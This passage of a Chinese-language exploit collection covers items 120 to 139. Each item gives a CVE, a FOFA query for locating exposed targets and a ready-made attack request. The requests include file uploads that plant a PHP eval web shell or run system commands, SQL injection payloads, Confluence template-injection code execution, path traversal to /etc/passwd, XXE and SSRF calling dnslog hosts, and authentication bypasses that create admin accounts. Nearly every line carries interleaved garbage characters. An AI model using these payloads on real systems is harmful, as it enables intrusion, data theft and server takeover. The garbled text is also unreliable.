* G. ?. u$ K$ w3 \% k$ q6 p& ksrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
% s( Y* P) N8 h( j- X& m
( z0 l& C3 e8 q7 f& b* f( e, q: @5 M( L6 i `) _; K
120. 北京百绰智能S40管理平台导入web.php任意文件上传! g/ W! Q4 @% e9 L$ C$ S0 Q# X! K
CVE-2024-1253) g9 R/ s( O3 s# |. W. L: g6 c
FOFA:title="Smart管理平台"
1 Y$ `! ^0 ]" w3 \! XPOST /useratte/web.php? HTTP/1.1
6 c6 R; F: T; A3 P- g% ]+ v5 q8 S4 JHost: ip:port8 o8 r' K& U3 A: R) ~% ?5 r
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db4 \! _3 h- z9 r1 b
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
, @( W3 W" W+ UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 i& e4 f7 [) m4 U/ U+ ]* v! S0 ?3 `7 d pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( C: Q% k; h! _ o
Accept-Encoding: gzip, deflate( C) I; P' ?# y# i- f2 k
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328) q( k; w% f$ W
Content-Length: 597
$ Y f0 T6 l6 d H, ]Origin: https://ip:port3 x5 R6 z& }2 z7 G8 A" c
Referer: https://ip:port/sysmanage/licence.php# U$ ]) `$ J6 N5 o8 ]. {# j
Upgrade-Insecure-Requests: 13 a4 ], Y% G" s
Sec-Fetch-Dest: document& n. q$ j' m: p t' L
Sec-Fetch-Mode: navigate
* G) H5 j7 R+ l' }Sec-Fetch-Site: same-origin
/ y8 q* ]# j! [. ~% eSec-Fetch-User: ?11 `) T; O8 I, i) L
Te: trailers
H3 A" E% @% U, @Connection: close
1 {& e- W- L7 V) d; ]. ]3 c1 M' x3 f# s
-----------------------------42328904123665875270630079328# C: T \! q+ ?( I k ^. P
Content-Disposition: form-data; name="file_upload"; filename="2.php"9 a1 S. ^! w: X1 [& d) y8 a
Content-Type: application/octet-stream0 _* O8 W$ @- U: z. {! V
% v+ M/ V4 G- o Z, }
<?php phpinfo()?>9 r( B, l8 i, I/ F K. \1 Q- f/ v
-----------------------------42328904123665875270630079328
$ L5 X# t' u" w+ k: eContent-Disposition: form-data; name="id_type"9 S; ]; Q o1 I* }4 G
* [0 M+ c/ K6 G& l' j4 R, U$ n) W3 p
10 m, ?: {1 W; z4 g: V" V3 E+ O+ ~
-----------------------------42328904123665875270630079328' T" b( S! j6 v% k$ {7 J
Content-Disposition: form-data; name="1_ck"
' e3 g- M) u% m+ I0 N0 Y% W: n& g6 C2 q6 h& i( `9 [9 ]
1_radhttp7 [$ f3 D8 Q3 |: H
-----------------------------423289041236658752706300793281 x/ ?; p' G) Y5 s$ b7 ^6 ~9 {; P
Content-Disposition: form-data; name="mode"9 _ J+ s. {5 E8 w
$ Q' \+ g# g7 x; _4 L) Pimport1 |, `% l8 T' x# }
-----------------------------42328904123665875270630079328, r1 j+ C6 n' p) O; t
, w/ ]/ L1 t( \8 ^& ?* k( K' T/ _
* o* A P/ \% y' Q* I. A" \
文件路径/upload/2.php
, e" c9 z2 o1 q: s* r2 E5 @( h
# A9 ?' B, m; N8 \8 A, ]' M) B121. 北京百绰智能S42管理平台userattestation.php任意文件上传
# Q2 m' K/ J+ K' ^! E; B; BCVE-2024-1918
7 J4 V* w) H3 x6 pFOFA:title="Smart管理平台": s+ L' g4 ~, d" _$ \& a
POST /useratte/userattestation.php HTTP/1.1
; N' B# a0 T; o7 t# `7 J& [ nHost: 192.168.40.130:8443
5 c1 e( H; \! o7 X7 CCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50( C% o9 p' ?9 ^& q
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
( L/ ^) x! B M) I# s5 q+ DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 o0 G; X2 x- sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" ^$ f2 [+ Z- H2 ^6 ^ yAccept-Encoding: gzip, deflate' e4 O K# \5 t% k9 I9 J
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
# S L) B/ j+ b* B& B- r) `- }Content-Length: 592* w h" w" K' A6 K- l( H/ R) s9 T
Origin: https://192.168.40.130:8443
* J; W* l" [$ L" E3 i' \" vUpgrade-Insecure-Requests: 1
# A" N' n K5 _9 l* u, J8 JSec-Fetch-Dest: document
# d- T1 o; _1 }' qSec-Fetch-Mode: navigate
/ ~. Q) ~+ L K- FSec-Fetch-Site: same-origin
2 ~: e7 F" P/ c' ?' JSec-Fetch-User: ?1% D+ k; o, j' N
Te: trailers
' N$ f( A9 ^) L( BConnection: close6 n( Y# \, l2 t( E7 N( R
/ i/ l/ f+ z) v-----------------------------423289041236658752706300793284 D) _7 J, q v' _2 U( L
Content-Disposition: form-data; name="web_img"; filename="1.php". S+ F5 G. L! e5 T O
Content-Type: application/octet-stream
) t+ U3 O% M7 _" L/ X* S6 n9 C ], X4 ~6 P) Q
<?php phpinfo();?>
7 u) U4 N" v8 C4 y6 s; I: g3 Q# t-----------------------------42328904123665875270630079328
6 P6 j, W! w/ D, |Content-Disposition: form-data; name="id_type"
# d& F( @! l) X* Q' L4 {: M! z3 i( B/ W% n1 D; a" g
1
) v; A" e f v. H9 N-----------------------------42328904123665875270630079328
7 Z% a* }7 a2 I6 Z5 kContent-Disposition: form-data; name="1_ck"
. B: }# l" t# r7 J+ I; W$ y: P2 j0 Z, t" g3 h- s
1_radhttp, t5 h7 f' Z- x1 J; A6 P/ d
-----------------------------42328904123665875270630079328
0 f2 q2 y% ?7 E& p/ B+ |: W+ B; EContent-Disposition: form-data; name="hidwel"" m5 }9 Y- L5 V
A. w1 x) v$ t- r$ uset. {: U" U+ r" i/ I
-----------------------------42328904123665875270630079328
/ G1 s, ]' ^1 B
$ s1 B* d- X* e
, H! N/ \5 g/ O3 `4 h0 |: eboot/web/upload/weblogo/1.php* E% C" W7 {. z# O p, B- l% V
% ^ K+ V. ^3 U. L/ F$ t4 F5 w
122. 北京百绰智能s200管理平台/importexport.php sql注入9 ~/ p( u% a" R0 X7 v7 e
CVE-2024-27718FOFA:title="Smart管理平台", h# g% ^: K. h% r9 s) A
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
. ]9 m( M4 ]( U6 W: Y7 z+ s. TGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.16 i6 J) v& K4 j
Host: x.x.x.x
3 ~) L" \5 V% j5 W ?3 }9 ~Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0/ t# L$ H* g" R$ _1 R7 P$ M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) i) c, m& S$ [# p0 o2 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. v" F% ]% v6 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ {; L+ \. |0 Y+ [; A0 Z: c
Accept-Encoding: gzip, deflate, br
" ]! L- H; c9 XUpgrade-Insecure-Requests: 1. r/ C7 U% y, ~" v* \7 x
Sec-Fetch-Dest: document
* H! ?2 W! W" ~6 p! `: ASec-Fetch-Mode: navigate
. b+ {, i/ c9 ?, `+ d/ k u. GSec-Fetch-Site: none
6 B4 b( D: w! H) ^Sec-Fetch-User: ?1+ W( Z% o+ X1 P2 ]. z* j
Te: trailers( U% F9 A3 Y; A
Connection: close; h3 |+ S! d( X
/ M0 \% E, _) a6 T) ~7 @( p
# a8 d6 G. E: J, G9 b4 |3 ]123. Atlassian Confluence 模板注入代码执行: E! i1 C% V" \6 u2 |& y
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
" V( c x, e0 b* U7 j+ JPOST /template/aui/text-inline.vm HTTP/1.1* A7 x$ ?7 D x2 J( J2 [
Host: localhost:80903 ]# K, M' v! c [
Accept-Encoding: gzip, deflate, br
0 }1 Y7 x# _( `/ ^/ L$ G& u, iAccept: */*( a3 Y- Q+ d' k4 ]
Accept-Language: en-US;q=0.9,en;q=0.8
! f3 h. x1 ?: h5 h4 W T. G' o+ HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36) N, h& y/ A7 g: L" T& S
Connection: close
6 @+ O! w9 e6 \( ^) OContent-Type: application/x-www-form-urlencoded7 m! t$ k3 A ^* n' {2 D7 B% E
0 f) `% m _1 s, P& c8 Ilabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))( u b; c5 `# h* m) j2 a
% e$ d4 [+ ?, c$ v }+ R: B3 j B5 I1 M1 l2 A1 b5 i, z- `1 d
124. 湖南建研工程质量检测系统任意文件上传" t& D3 E0 v, U! j; W8 L: K9 ?3 u: E
FOFA:body="/Content/Theme/Standard/webSite/login.css"
9 M" S# x! W% `. PPOST /Scripts/admintool?type=updatefile HTTP/1.1+ P6 i$ e- M# P* t2 l7 j
Host: 192.168.40.130:8282
' J6 }: M, k1 V% YUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36% q: @6 d# S$ z9 c0 E
Content-Length: 72
+ g2 K1 _9 L: C$ j; P2 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- o* Y/ X' Z' M+ v0 l5 F% Z* a: cAccept-Encoding: gzip, deflate, br& m. ?; E6 D/ m$ c- I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 n" Q! ^* ]6 lConnection: close
+ B0 x* n" ~& V4 y3 pContent-Type: application/x-www-form-urlencoded
' i! D+ ~- v# n) @# v% V; p+ j+ g
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>4 m- _" T% t+ M+ ]) Q5 n3 q
2 V* a! T- h* u3 M1 o
9 I7 p/ l- k' Z& D5 \& @& c4 hhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
5 x+ e4 `& W2 Q7 _" r( G& F e! }
( ?! I9 K8 u9 v \- ?/ H125. ConnectWise ScreenConnect身份验证绕过' f3 w/ e+ k! `/ g" V6 N, s/ ]
CVE-2024-1709
- t3 E: Z( W* Q: NFOFA:icon_hash="-82958153"0 V$ E4 H2 b R: l1 G9 U a
https://github.com/watchtowrlabs ... bypass-add-user-poc
6 u/ \" i" ^% ~; H5 Q! M0 T" t1 M5 _3 E$ D# h3 m! N
9 w% v" y4 R( T* G使用方法3 Z/ n7 e z) g, P0 v
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
$ P# f5 \( y- X' d' z
# O0 n0 _% T/ @! U; u+ a$ v5 r% g- R4 r. e
创建好用户后直接登录后台,可以执行系统命令。( H/ y* i1 t4 R- n/ b$ m
3 b2 ?3 z9 k. D3 H) S126. Aiohttp 路径遍历" q" c3 L9 u& ?$ T1 A% M! I& E m
FOFA:title=="ComfyUI"
1 {: L5 f0 _9 I* rGET /static/../../../../../etc/passwd HTTP/1.1 W( e1 i' N" y
Host: x.x.x.x# r8 }# v0 G2 k7 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" b! U8 A! n5 ~8 |" @( [
Connection: close
. I/ H9 y/ @2 b7 Y& Q; jAccept: */*
& ]5 p) E, T, T: ]9 N dAccept-Language: en: V* P$ r# R& @0 u1 I. s3 k
Accept-Encoding: gzip9 }- E8 F% e5 N) V" o" r8 I! }+ D
6 d7 U0 j7 s3 x2 p
/ u! _6 P) S1 S* a5 ]127. 广联达Linkworks DataExchange.ashx XXE( O7 D) `1 U) `7 c( G9 m
FOFA:body="Services/Identification/login.ashx"
5 d, ~2 J, b- @5 u" ]2 Q _POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
- y: S0 ] I9 f" `( S+ ~5 {Host: 192.168.40.130:8888, ?4 `0 t0 \/ U- L: {" q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36# P$ X `' L( g8 P/ z& y$ z/ Q
Content-Length: 415# C8 S# }- x7 y: c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ M# r7 b- p% y/ d+ \8 r" R3 E
Accept-Encoding: gzip, deflate
8 S) | X/ t4 l4 s9 {7 C- Y* i6 B# iAccept-Language: zh-CN,zh;q=0.98 L) d& l& A \" }* q; z
Connection: close1 g9 u- l- k" m6 C
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0$ O! D8 W3 k* J
Purpose: prefetch. u! w2 V: ]" ~3 H% T
Sec-Purpose: prefetch;prerender
0 n, t6 T4 S4 T2 W# p# E/ H) x; Q5 }* u- S8 s8 u9 x8 p
------WebKitFormBoundaryJGgV5l5ta05yAIe0
: p N$ s$ Q% HContent-Disposition: form-data;name="SystemName"4 h2 Z+ b* w9 \7 G/ I3 k
) [; v. o- S+ u& h a F
BIM/ Z7 l. H* m8 u4 v
------WebKitFormBoundaryJGgV5l5ta05yAIe0
3 Z4 B4 D7 h/ y# ]Content-Disposition: form-data;name="Params"$ ?2 ^: J% P( o J+ q
Content-Type: text/plain
$ {3 Z; r, @/ n! Q' z# o* }. b* x) f$ q* G! h3 `
<?xml version="1.0" encoding="UTF-8"?>
: F* s! u. t0 k4 K% c<!DOCTYPE test [
b! J" x9 C% G; m; M1 B! I<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
( R3 `! _0 }) x; Z] c* r0 \7 c2 E) R& C v# _* I
>! A6 x9 a# G# h: R
<test>&t;</test>" } n; I7 I! c8 ]! `
------WebKitFormBoundaryJGgV5l5ta05yAIe0--) W+ H0 d7 f, y0 O6 T3 i2 H
+ m, I3 s1 t: x7 @3 e6 @9 x* _1 u! _1 I( h! y& j
$ g! V7 c% p6 R% i128. Adobe ColdFusion 反序列化6 B9 H4 C1 A. e8 h2 d7 M4 I: z, _) ?( I
CVE-2023-38203
4 j0 d: e& m8 ?" j4 C# {- NAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本) S; {& u2 n; X/ M3 s
FOFA:app="Adobe-ColdFusion"
- a( c: Q5 e( fPAYLOAD' Y5 y) S& q r$ S0 \
! P2 \+ r5 k( G129. Adobe ColdFusion 任意文件读取
! B/ @/ P" _5 q/ B/ B/ s0 e" vCVE-2024-207676 E! o& F" Q9 s+ l0 G
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
0 g! y* x B' ]- T0 W. C第一步,获取uuid9 R/ x* Q9 q; b6 ~2 r
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
6 n; c" U5 @( r! H' n' kHost: x.x.x.x
, V' e$ q0 @ o- r. qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; ~4 b& a1 O% q, A+ g8 XAccept: */*
% v3 `0 c. v5 R4 J% N" R/ KAccept-Encoding: gzip, deflate. R% r. X' R5 M0 C! D/ i
Connection: close
' A5 Q0 W" ]8 C- O8 ?
0 g7 X' B c& q2 n9 E; j
$ Y& q) ?1 g5 O) e8 g第二步,读取/etc/passwd文件# r' b& k+ r* A, y& w
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1* g% b+ _$ l: X
Host: x.x.x.x: p0 F; c4 w2 p- ?* B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36# p. a5 H( C1 X4 E' r! j5 q2 O
Accept: */*/ e( x B: H8 s" C
Accept-Encoding: gzip, deflate# D: N/ C0 B/ `3 E, V
Connection: close! a; G( r/ T8 [( ~# S% m1 N/ ^1 E
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
, I2 ~5 p) t4 q: `% ^: I: {, r v* t
7 P5 }) o7 G2 l7 c$ b130. Laykefu客服系统任意文件上传
4 j4 h* f) R" v+ p, bFOFA:icon_hash="-334624619"" X& Z. V* W3 r6 F- K8 W9 T I# y
POST /admin/users/upavatar.html HTTP/1.17 B$ n; h; g- s9 {2 F( {9 e; [
Host: 127.0.0.12 |' H- ^3 R' Y* d
Accept: application/json, text/javascript, */*; q=0.01- `; M4 t7 Q+ Q3 t _
X-Requested-With: XMLHttpRequest
& d: `' M2 }" \. ]User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
8 H1 q, t) C+ W" ^, a- r. QContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
3 W8 }/ I" G9 v5 \" E9 ~Accept-Encoding: gzip, deflate
/ G- X x- z* s6 m5 V/ {' w, `Accept-Language: zh-CN,zh;q=0.9
. P/ u! [) u ~. r) vCookie: user_name=1; user_id=34 C v- W5 M, s8 Z
Connection: close5 M2 `' s* B- p9 m( }7 _# @
9 X& O1 }: O) k f5 a% x2 a+ J------WebKitFormBoundary3OCVBiwBVsNuB2kR
( r3 C$ x; X" U O! FContent-Disposition: form-data; name="file"; filename="1.php": a7 M9 v. \5 _! ^7 D- J
Content-Type: image/png
3 e) E3 V+ O8 G$ w/ K
3 _/ X7 }" h9 T<?php phpinfo();@eval($_POST['sec']);?>
* N2 a: c, ~ D9 W( Q' ?3 a* C------WebKitFormBoundary3OCVBiwBVsNuB2kR--6 ?, w$ X, o$ U6 d
8 O2 @9 f# ?! y. `5 K
k& Q4 ^* F4 D% q6 T5 T131. Mini-Tmall <=20231017 SQL注入
9 P8 H! q# W/ _# c5 ]- q* qFOFA:icon_hash="-2087517259"0 z, P \( K( p) E; q/ i* J Q, y
后台地址:http://localhost:8080/tmall/admin
# E5 ~$ t6 k) ~7 {! k8 Yhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)" G1 X! k4 u$ Y6 z6 d$ [
7 t6 z0 Z3 B0 Z5 C1 I132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
7 D* T" x1 f" E/ ECVE-2024-27198
/ u% R* a$ v* g% S0 @( V& AFOFA:body="Log in to TeamCity"
! T6 O" J* m3 H: B0 h' @: ]& wPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
' L, ]& ?* N$ H& V) h0 SHost: 192.168.40.130:8111
( N( M& L [0 l' y3 l0 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 F9 O' c; ~5 m$ J
Accept: */*7 o3 o* [: n( s5 X! @; r
Content-Type: application/json
# X9 h4 b5 T; {3 hAccept-Encoding: gzip, deflate
# t$ }3 Q9 @: O/ \% R4 f0 g: R. q4 L2 Q* R! s+ b' w# l8 w
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}* G1 ^2 ]2 G v% W+ A/ D
& H* X) `: K, H \% e
/ f; }9 U* c: D
CVE-2024-27199: B4 D: Q5 y* ^8 S' Q: L
/res/../admin/diagnostic.jsp6 w) U' ]' e0 }1 W0 H
/.well-known/acme-challenge/../../admin/diagnostic.jsp
, v6 F$ i2 E5 G o: d/update/../admin/diagnostic.jsp
% ` ?% |" a8 J1 ~$ a# r; z* i0 @* n y( y9 S. O3 f5 @; ~
; T: q4 W2 z+ q( MCVE-2024-27198-RCE.py- ~/ i0 U) e' e0 _- Q- w, n( f
$ N8 {( D; K$ H& w1 a4 `133. H5 云商城 file.php 文件上传; t* x( x5 O* |/ x' r( c2 W
FOFA:body="/public/qbsp.php"9 |$ {8 I, M( |) q' i" L# k
POST /admin/commodtiy/file.php?upload=1 HTTP/1.16 n4 Y; ?- s7 m/ [' ?
Host: your-ip
5 L* {! b; k$ q G6 b4 H$ f5 {* TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
& X! M; M! G! n, {; ?, `Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx! g0 X7 p0 J# Q3 W
. m. M" {0 A2 D1 V0 a
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
" ^: L |- H% ]* iContent-Disposition: form-data; name="file"; filename="rce.php", v8 e8 g( V8 j5 A6 A& V3 U0 `: ^
Content-Type: application/octet-stream( t! k) P9 W0 A" P$ E
6 ]/ u4 A: T5 J$ B2 w) ~; }4 m
<?php system("cat /etc/passwd");unlink(__FILE__);?> x3 P1 ]. N. `5 H
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--6 K( f$ v5 z7 t3 t" N6 Q! x
/ R7 F9 X, O( f: S
- i0 M* A) R [% [8 C1 ]; l
9 ^# }0 |2 `% }4 i134. 网康NS-ASG应用安全网关index.php sql注入2 x5 ` L& n9 K K Y& B! C) A
CVE-2024-2330
# x p6 @6 J& `5 [Netentsec NS-ASG Application Security Gateway 6.3版本
3 g$ j, [% N9 m# S/ m4 MFOFA:app="网康科技-NS-ASG安全网关"
( k0 \/ _- b, i1 OPOST /protocol/index.php HTTP/1.1' e, o: M) [- t+ J
Host: x.x.x.x. O$ j, ^, t( M3 A
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de: `* l+ M y: `; s* H: h0 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0* a/ D- N% z& S9 l% a
Accept: */*
$ {+ V* _1 G1 `3 D# gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- l- e" W* g5 g ^Accept-Encoding: gzip, deflate
5 [7 W B$ U, c7 a' R! dSec-Fetch-Dest: empty
% I6 Y' @: k; D! r- KSec-Fetch-Mode: cors& e# B; `" I; r3 s4 f
Sec-Fetch-Site: same-origin. P$ M4 h! \# e! V, i6 e4 v8 Z+ i
Te: trailers# z) f1 c7 \0 d
Connection: close
0 k/ Y" q* C. K' r/ N8 {Content-Type: application/x-www-form-urlencoded
# `" H1 Y: Y$ ~$ _' S7 B2 k( cContent-Length: 263
, b- I" o0 ]4 n! V
: A: T- d( j4 L/ ijsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}% m5 B: Q$ b5 K' c
0 z; f8 b8 z$ h) L7 \$ {7 E( a1 T# |& a1 T( l
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
# n; m L4 d- Z3 k) i8 G9 nCVE-2024-2022, s7 _" R. ]4 N J) a- {4 ]" N) m7 \
Netentsec NS-ASG Application Security Gateway 6.3版本
; m; K, n0 K. H2 x+ K! qFOFA:app="网康科技-NS-ASG安全网关"3 M. [7 y0 m( B4 a5 O
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.18 l# Z( X3 r, W( @: X2 E
Host: x.x.x.x
) R3 m6 v$ U, ]7 ]4 T# \2 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( A F7 }+ k- h' _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" D9 X* A6 i# M, IAccept-Encoding: gzip, deflate% W, u# i* A+ ]& v' z5 w
Accept-Language: zh-CN,zh;q=0.9
6 K0 k8 h4 u: h H F7 U1 X3 \Connection: close
5 Z J: [. y% b3 R2 K. R, w9 R& q% a) u, b5 X( u
2 R P. k, K! J+ @/ J, w136. NextChat cors SSRF
0 R, R, c; V) W7 f" UCVE-2023-49785$ ]& B/ q+ b7 x7 _, s7 v1 I2 A
FOFA:title="NextChat"3 J) \ o7 _; h( \
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
1 d1 y9 Y# \- U0 R: g. o! OHost: x.x.x.x:100006 d! ~& [3 @' P( r f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 {2 R) u2 f: h0 Q) Q
Connection: close
& g3 Z$ o8 F! H$ v) n& HAccept: */*
$ i( c Z7 b2 J% tAccept-Language: en9 c- j1 Q& d0 h* i1 q
Accept-Encoding: gzip
- U' u2 J+ M& o1 M$ T! @" J8 N) a, H( v1 \" u
- x% v3 Z* t# t! [8 B137. 福建科立迅通信指挥调度平台down_file.php sql注入
8 B2 R; ?& B' e6 _; j n w3 e6 VCVE-2024-2620
' J8 s' S. Q* C3 [' J7 OFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"+ C' H) a$ Q- | c8 S
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.19 d% K w5 l1 P* V/ c0 i
Host: x.x.x.x/ Z& p; k& T0 W# r8 l9 z! R' w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) ?1 ~- L% Q. |$ k) Y! X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ l+ ~4 \6 L2 c6 D$ p/ `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' J; A N6 O# {, x
Accept-Encoding: gzip, deflate, br5 C4 _8 ?, q3 Z% d( X8 Y
Connection: close$ C+ ], |! g. ?" y+ G. c0 |
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
* ~* V8 `5 p: D: C/ p8 GUpgrade-Insecure-Requests: 1, q. ?% d8 N. ?7 h0 e- C
: D F$ J9 w# ?& |- b# z& e) g% B" R& K- e
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
1 B! S! o- [) b8 m) s* g& v1 CCVE-2024-2621
: t& U$ p; J" x: M7 S. X/ r D; HFOFA:body="app/structure/departments.php" || app="指挥调度管理平台", A- j. Y! i* f: S3 q7 }, w
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.15 w1 j, R/ m8 l& w( `* d
Host: x.x.x.x& Q7 m- b7 a5 l: ~' k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
2 b+ w. O8 I' Y2 m! j& w) F, v% n0 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, [/ P7 Q I# W& e A( N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 v' w& H, Z6 w$ [* }( E
Accept-Encoding: gzip, deflate, br. r! C2 i3 y! R( U/ r
Connection: close5 N& p5 D$ a0 Y ^# j
Upgrade-Insecure-Requests: 1' J# A* U! j' |! m9 l9 z- W6 ?
a) L6 P0 O+ r* E% U }3 W; p/ o: N. Z2 }- B6 l2 {
139. 福建科立讯通信指挥调度平台editemedia.php sql注入! x6 ], `/ a+ U9 j
CVE-2024-2622
' y! |" ]9 w" u' M9 u" iFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
3 s N7 e+ C. j e; I3 P1 L F0 Z5 aGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
5 I, @+ w3 i; x1 z$ RHost: x.x.x.x. w- ^' Z/ k/ \' M w0 r
